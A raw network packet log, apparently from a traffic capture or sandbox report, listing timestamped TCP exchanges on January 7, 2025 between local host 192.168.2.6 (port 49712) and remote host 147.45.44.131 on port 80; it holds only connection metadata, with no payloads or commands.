                                                                          Jan 7, 2025 06:12:06.245417118 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245423079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245434046 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245434046 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245445967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245455980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245461941 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245491982 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245497942 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245508909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245521069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245541096 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245558977 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245594025 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245604992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245616913 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245628119 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245637894 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245646000 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245654106 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245673895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245687962 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245698929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245718002 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245728970 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245734930 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245740891 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245775938 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245913982 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245927095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245937109 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245954037 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245964050 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245965004 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245976925 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.245982885 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.245990038 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246001959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246005058 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246016026 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246025085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246035099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246037006 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246051073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246068001 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246068954 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246074915 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246087074 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246099949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246109009 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246114969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246126890 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246151924 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246174097 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246190071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246201992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246211052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246232986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246237993 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246253967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246264935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246274948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.246278048 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.246304035 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.284051895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284090996 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284110069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284115076 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284126043 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284137964 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284147978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284159899 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.284209967 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.284245968 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336451054 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336467028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336476088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336482048 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336488008 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336493015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336499929 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336503983 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336512089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336556911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336560965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336575031 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336611986 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336622953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336635113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336649895 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336661100 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336661100 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336672068 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336713076 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336757898 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336822987 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336833000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336843014 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336858034 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336863041 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336869955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336879015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336884022 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336894989 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336898088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336910963 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336920977 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336921930 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336945057 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336957932 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336971045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.336977005 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.336983919 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337044954 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337049961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337061882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337071896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337081909 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337091923 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337116957 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337133884 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337147951 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337157965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337167978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337197065 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337215900 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337217093 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337229013 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337239981 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337244987 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337272882 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337276936 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337285995 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337297916 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337308884 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337326050 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337358952 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337384939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337394953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337404966 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337416887 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337431908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337433100 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337444067 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337449074 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337480068 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337481022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337492943 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337502956 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337512016 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337546110 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337614059 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337625027 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337642908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337654114 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337663889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337676048 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337676048 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337687969 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337694883 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337701082 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337719917 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337749958 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337774992 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337785959 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337795973 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337807894 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337829113 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337840080 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337852955 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337862968 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337872028 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337883949 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337892056 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337894917 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337905884 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337912083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337919950 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337934971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337946892 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.337953091 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.337977886 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338017941 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338028908 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338038921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338049889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338053942 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338072062 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338133097 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338145018 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338155985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338165045 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338170052 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338179111 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338187933 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338216066 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338295937 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338306904 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338316917 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338327885 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338336945 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338339090 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338349104 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338360071 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338368893 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338370085 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338411093 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338411093 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338424921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338434935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338445902 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338455915 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338460922 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338468075 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338478088 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338484049 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338489056 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338517904 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338531971 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338542938 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338552952 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338567972 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338570118 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338587999 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338592052 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338603020 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338613987 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.338630915 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.338654041 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.376307011 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376322985 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376332998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376398087 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376409054 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376420021 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376418114 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.376432896 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376446009 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.376481056 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.376501083 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.401407003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.428787947 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428805113 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428816080 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428833961 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428850889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428868055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428869963 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.428879023 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428893089 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428903103 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428914070 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428917885 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.428919077 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428930998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.428944111 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.428961992 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.428991079 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429090977 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429101944 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429112911 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429132938 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429141998 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429143906 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429156065 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429164886 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429171085 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429177999 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429189920 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429199934 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429209948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429213047 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429225922 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429229021 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429236889 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429248095 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429264069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429272890 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429275036 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429285049 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429287910 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429296970 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429305077 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429316998 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429327965 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429333925 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429337978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429351091 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429372072 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429373980 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429384947 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429394960 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429395914 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429408073 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429419041 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429447889 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429464102 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429475069 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429485083 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429496050 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429507017 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429513931 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429517984 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429541111 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429553986 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429554939 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429567099 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429598093 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429600000 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429611921 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429621935 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429631948 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429641962 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429668903 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429694891 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429704905 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429716110 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429723978 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429752111 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429759979 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429775953 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429785967 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429797888 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429814100 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429830074 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429841042 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429851055 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429861069 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.429862022 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.429883003 CET4971280192.168.2.6147.45.44.131
                                                                          Jan 7, 2025 06:12:06.430020094 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.430032015 CET8049712147.45.44.131192.168.2.6
                                                                          Jan 7, 2025 06:12:06.430042028 CET8049712147.45.44.131192.168.2.6
